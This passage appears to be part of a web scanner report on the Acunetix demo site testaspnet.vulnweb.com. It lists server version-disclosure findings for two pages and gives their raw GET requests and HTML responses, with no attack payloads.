value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBOTh8PekaV12ulQ7L2d+yr9JWRLj" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <DIV class="NewsDate">posted by <strong>admin </strong> on 5/16/2019 12:32:30 PM <a href="Comments.aspx?id=0" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:37:35 AM <a href="Comments.aspx?id=3" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:35:22 AM <a href="Comments.aspx?id=2" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/login.aspx
Method	GET
Parameter
Attack
Evidence	2.0.50727
Show / hide Request and Response
Request Header - size: 322 bytes.	GET http://testaspnet.vulnweb.com/login.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:15 GMT Content-Length: 13421
Response Body - size: 13,421 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>login</title> <meta name="vs_showGrid" content="True"> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="frmLogin" method="post" action="login.aspx" id="frmLogin"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTIyMzk2OTgxMQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQ9jYlBlcnNpc3RDb29raWVzwbv+Q8XadeewSqHhJbH9z4dvJw==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['frmLogin']; if (!theForm) { theForm = document.frmLogin; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="C2EE9ABB" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWwLoz/fGCgLStq24BwK3jsrkBALtuvfLDQKC3IeGDAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBG0lSndyVrygwyPPM/uCBtd+n7UP" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top" align="center"> <TABLE id="Table2" cellSpacing="0" cellPadding="5" border="0" align="center" class="FramedForm"> <TR> <TD>Username:</TD> <TD align="right"> <input name="tbUsername" type="text" id="tbUsername" class="Login" /></TD> </TR> <TR> <TD>Password:</TD> <TD align="right"> <input name="tbPassword" type="password" id="tbPassword" class="Login" /></TD> </TR> <TR> <TD align="left" colSpan="2"><input name="cbPersistCookie" type="checkbox" id="cbPersistCookie" checked="checked" class="classic" /> Remember me </TD> </TR> <TR> <TD></TD> <TD align="right"> <input type="submit" name="btnLogin" value="Login" id="btnLogin" /></TD> </TR> </TABLE> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?id=0
Method	GET
Parameter
Attack
Evidence	2.0.50727
Show / hide Request and Response
Request Header - size: 349 bytes.	GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=0 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=0 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:16 GMT Content-Length: 22839
Response Body - size: 22,839 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?id=0" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WAh8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fuc2QCBw8WAh8BBbMePHA+PHN0cm9uZz5Mb25kb24sIFVLPC9zdHJvbmc+ICZuZGFzaDsgPHN0cm9uZz5NYXkgMjAxOTwvc3Ryb25nPiAmbmRhc2g7IEFjdW5ldGl4LCB0aGUgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHNvZnR3YXJlLCBoYXMgYW5ub3VuY2VkIHRoYXQgYWxsIHZlcnNpb25zIG9mIHRoZSA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvPkFjdW5ldGl4IFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjwvYT4gbm93IHN1cHBvcnQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL25ldHdvcmstc2VjdXJpdHktc2Nhbm5lci8+bmV0d29yayBzZWN1cml0eSBzY2FubmluZzwvYT4uIE5ldHdvcmsgc2VjdXJpdHkgc2NhbnMgYXJlIHBvc3NpYmxlIHRoYW5rcyB0byB0aGUgc2VhbWxlc3MgaW50ZWdyYXRpb24gb2YgQWN1bmV0aXggd2l0aCB0aGUgcG93ZXJmdWwgT3BlblZBUyBzZWN1cml0eSBzb2x1dGlvbi4gVW50aWwgbm93LCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5uaW5nIGZ1bmN0aW9uYWxpdHkgd2FzIGF2YWlsYWJsZSBvbmx5IGluIEFjdW5ldGl4IE9ubGluZS48L3A+ICAgICA8cD4mbGRxdW87Tm8gbWF0dGVyIHRoZSBzaXplIG9mIHlvdXIgYnVzaW5lc3MsIHlvdSB1c2UgbXVsdGlwbGUgc2VjdXJpdHkgbWVhc3VyZXMgdG8gYWxsZXZpYXRlIGRpZmZlcmVudCB0eXBlcyBvZiByaXNrcy4gWW91ciBzZWN1cml0eSBzdHJhdGVneSBtdXN0IGFsd2F5cyBpbmNsdWRlIGJvdGggd2ViIHNlY3VyaXR5IHNjYW5zIGFuZCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5zLiBBbmQgaXQgbWFrZXMgaXQgc28gbXVjaCBlYXNpZXIgYW5kIG11Y2ggbW9yZSBlZmZpY2llbnQgaWYgeW91IGNhbiBkbyB0aGU